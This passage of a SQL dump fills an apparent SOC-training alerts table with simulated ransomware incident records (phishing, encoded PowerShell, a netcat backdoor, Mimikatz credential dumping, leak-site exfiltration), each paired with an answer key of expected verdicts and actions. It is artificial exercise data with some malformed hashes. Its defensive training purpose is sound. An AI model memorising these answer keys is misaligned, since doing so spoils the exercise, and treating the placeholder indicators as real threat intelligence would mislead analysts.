1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:55Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"5e884898da28047151d0e56f8dc6292773603d0d6aabbddf\\\",\\\"user\\\":\\\"john_doe\\\",\\\"action\\\":\\\"allowed\\\",\\\"rule_triggered\\\":\\\"Sensitive Data Transfer\\\",\\\"alert_severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.538Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:55Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"5e884898da28047151d0e56f8dc6292773603d0d6aabbddf\\\",\\\"user\\\":\\\"john_doe\\\",\\\"action\\\":\\\"allowed\\\",\\\"rule_triggered\\\":\\\"Sensitive Data Transfer\\\",\\\"alert_severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.538Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:55Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"5e884898da28047151d0e56f8dc6292773603d0d6aabbddf\\\",\\\"user\\\":\\\"john_doe\\\",\\\"action\\\":\\\"allowed\\\",\\\"rule_triggered\\\":\\\"Sensitive Data Transfer\\\",\\\"alert_severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.538Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:55Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"5e884898da28047151d0e56f8dc6292773603d0d6aabbddf\\\",\\\"user\\\":\\\"john_doe\\\",\\\"action\\\":\\\"allowed\\\",\\\"rule_triggered\\\":\\\"Sensitive Data Transfer\\\",\\\"alert_severity\\\":\\\"Critical\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1562, 'Initial Access: Spear Phishing Campaign', 'high', 'Email Gateway Logs', 'A spear phishing email was detected targeting key personnel to compromise user credentials and gain network access. The email contained a malicious attachment and was sent from an external IP address associated with known threat actor ALPHV.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:12Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"email_subject\":\"Urgent: Update Your Account Information\",\"sender_email\":\"john.doe@maliciousdomain.com\",\"recipient_email\":\"jane.smith@company.com\",\"attachment\":{\"filename\":\"Account_Update.docx\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"}', '2026-03-15 19:13:33', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with ALPHV phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"john.doe@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address used in phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Account_Update.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis Service\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by ALPHV.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Spear Phishing Campaign\",\"date\":\"2026-03-15T20:58:15.542Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1563, 'Execution: Rust-Based Ransomware Deployment', 'high', 'Endpoint Detection and Response (EDR) System', 'The ALPHV ransomware group has deployed a Rust-based ransomware payload on an internal network device, aiming to encrypt critical data files using advanced encryption techniques. This is the second step in their operation, following initial access.', 'Malware', 'T1059.006', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"EDR-8764\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"10.2.3.15\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"process_name\":\"ransomware_exe.exe\",\"file_hash\":\"b0c4d5e3f6a7b8c9d1e2f3a4b5c6d7e8f9g0h1i2\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\ransomware_exe.exe\",\"malware_family\":\"ALPHV\",\"detected_action\":\"file execution\",\"severity_level\":\"high\"}', '2026-03-15 19:13:33', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised endpoint.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.2.3.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address targeted for ransomware deployment.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with ransomware operations.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware_exe.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious\",\"verdict\":\"malicious\",\"details\":\"File associated with the ALPHV ransomware family.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"b0c4d5e3f6a7b8c9d1e2f3a4b5c6d7e8f9g0h1i2\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of the ALPHV ransomware campaign.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1564, 'Persistence: Establishing Backdoor Access', 'high', 'Network Traffic Analysis', 'Detected unusual outbound traffic patterns indicative of backdoor installation by the ALPHV group. Analysis reveals communication with known malicious IP addresses and the execution of suspicious binaries.', 'Backdoor', 'T1105: Ingress Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.57\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"dst_port\":4444,\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"netcat.exe\",\"username\":\"compromised_user\",\"event_type\":\"network_connection\",\"direction\":\"outbound\",\"action\":\"allowed\"}', '2026-03-15 19:13:33', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised system\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with ALPHV group\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":false,\"osint_result\":{\"source\":\"malwaredb\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious netcat binary\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"netcat.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used for unauthorized remote access\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"userdb\",\"verdict\":\"suspicious\",\"details\":\"Account observed in suspicious activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1565, 'Lateral Movement: Network Propagation', 'critical', 'SIEM Alerts', 'ALPHV has successfully moved laterally within the network, exploiting weak credentials and unpatched systems to expand control over additional systems. Credential dumping activity detected during the operation.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:37:45Z\",\"event_type\":\"credential_dumping\",\"source_ip\":\"185.243.115.84\",\"destination_ip\":\"192.168.1.15\",\"user\":\"compromised_user\",\"file_name\":\"lsass_dump.dmp\",\"hash\":\"3a4b55c88d2f4b6a9ccf3c4e9d6d8e4b\",\"action\":\"dumped_credentials\",\"description\":\"ALPHV actor utilized Mimikatz to dump credentials from LSASS process.\"}', '2026-03-15 19:13:33', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.243.115.84\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used in lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"lsass_dump.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"File associated with credential dumping.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3a4b55c88d2f4b6a9ccf3c4e9d6d8e4b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Mimikatz sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:37:45Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"185.243.115.84\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_name\\\":\\\"lsass_dump.dmp\\\",\\\"hash\\\":\\\"3a4b55c88d2f4b6a9ccf3c4e9d6d8e4b\\\",\\\"action\\\":\\\"dumped_credentials\\\",\\\"description\\\":\\\"ALPHV actor utilized Mimikatz to dump credentials from LSASS process.\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:37:45Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"185.243.115.84\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_name\\\":\\\"lsass_dump.dmp\\\",\\\"hash\\\":\\\"3a4b55c88d2f4b6a9ccf3c4e9d6d8e4b\\\",\\\"action\\\":\\\"dumped_credentials\\\",\\\"description\\\":\\\"ALPHV actor utilized Mimikatz to dump credentials from LSASS process.\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:37:45Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"185.243.115.84\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_name\\\":\\\"lsass_dump.dmp\\\",\\\"hash\\\":\\\"3a4b55c88d2f4b6a9ccf3c4e9d6d8e4b\\\",\\\"action\\\":\\\"dumped_credentials\\\",\\\"description\\\":\\\"ALPHV actor utilized Mimikatz to dump credentials from LSASS process.\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:37:45Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"185.243.115.84\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_name\\\":\\\"lsass_dump.dmp\\\",\\\"hash\\\":\\\"3a4b55c88d2f4b6a9ccf3c4e9d6d8e4b\\\",\\\"action\\\":\\\"dumped_credentials\\\",\\\"description\\\":\\\"ALPHV actor utilized Mimikatz to dump credentials from LSASS process.\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:37:45Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"185.243.115.84\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_name\\\":\\\"lsass_dump.dmp\\\",\\\"hash\\\":\\\"3a4b55c88d2f4b6a9ccf3c4e9d6d8e4b\\\",\\\"action\\\":\\\"dumped_credentials\\\",\\\"description\\\":\\\"ALPHV actor utilized Mimikatz to dump credentials from LSASS process.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1566, 'Exfiltration: Data Leak Site Upload', 'critical', 'Data Leak Monitoring Service', 'ALPHV has uploaded sensitive data to their leak site, threatening to expose it publicly if ransom demands are not met. This critical step signifies the culmination of their data exfiltration attack, increasing pressure on the victim to comply with the ransom.', 'Data Exfiltration', 'T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:52Z\",\"event_id\":\"DL-2023-1015\",\"source_ip\":\"198.51.100.45\",\"destination_ip\":\"203.0.113.5\",\"internal_ip\":\"192.168.1.35\",\"username\":\"jdoe\",\"exfiltrated_files\":[\"confidential_data.zip\",\"financial_records.xlsx\"],\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"leak_site_url\":\"http://malicious-leak-site.com/upload\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\",\"action\":\"Upload\",\"threat_actor\":\"ALPHV\"}', '2026-03-15 19:13:33', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"Known ALPHV threat actor IP used for exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal host used for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-leak-site.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"Known leak site associated with ALPHV.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with exfiltrated confidential data.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal File Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file exfiltrated to leak site.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.563Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"event_id\\\":\\\"DL-2023-1015\\\",\\\"source_ip\\\":\\\"198.51.100.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_data.zip\\\",\\\"financial_records.xlsx\\\"],\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"leak_site_url\\\":\\\"http://malicious-leak-site.com/upload\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\",\\\"action\\\":\\\"Upload\\\",\\\"threat_actor\\\":\\\"ALPHV\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.563Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"event_id\\\":\\\"DL-2023-1015\\\",\\\"source_ip\\\":\\\"198.51.100.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_data.zip\\\",\\\"financial_records.xlsx\\\"],\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"leak_site_url\\\":\\\"http://malicious-leak-site.com/upload\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\",\\\"action\\\":\\\"Upload\\\",\\\"threat_actor\\\":\\\"ALPHV\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.563Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"event_id\\\":\\\"DL-2023-1015\\\",\\\"source_ip\\\":\\\"198.51.100.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_data.zip\\\",\\\"financial_records.xlsx\\\"],\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"leak_site_url\\\":\\\"http://malicious-leak-site.com/upload\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\",\\\"action\\\":\\\"Upload\\\",\\\"threat_actor\\\":\\\"ALPHV\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.563Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"event_id\\\":\\\"DL-2023-1015\\\",\\\"source_ip\\\":\\\"198.51.100.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_data.zip\\\",\\\"financial_records.xlsx\\\"],\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"leak_site_url\\\":\\\"http://malicious-leak-site.com/upload\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\",\\\"action\\\":\\\"Upload\\\",\\\"threat_actor\\\":\\\"ALPHV\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.563Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"event_id\\\":\\\"DL-2023-1015\\\",\\\"source_ip\\\":\\\"198.51.100.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_data.zip\\\",\\\"financial_records.xlsx\\\"],\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"leak_site_url\\\":\\\"http://malicious-leak-site.com/upload\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\",\\\"action\\\":\\\"Upload\\\",\\\"threat_actor\\\":\\\"ALPHV\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1567, 'Phishing Campaign Detected', 'medium', 'Email Gateway Logs', 'A phishing email was detected attempting to gain initial access to the network. The email contained a malicious attachment linked to the LockBit ransomware group.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:32:00Z\",\"email\":{\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.2.3\",\"from\":\"attacker@example.com\",\"to\":\"user@company.com\",\"subject\":\"Urgent: Update Your Account Information\",\"attachment\":{\"filename\":\"Invoice_8374.docx\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\"},\"urls\":[\"http://malicious-link.com/update\"]}}', '2026-03-15 19:15:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash known to be associated with LockBit ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address linked to phishing activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"Invoice_8374.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used in phishing campaigns.\"}},{\"id\":\"artifact_6\",\"type\":\"url\",\"value\":\"http://malicious-link.com/update\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"URL used for phishing and malware 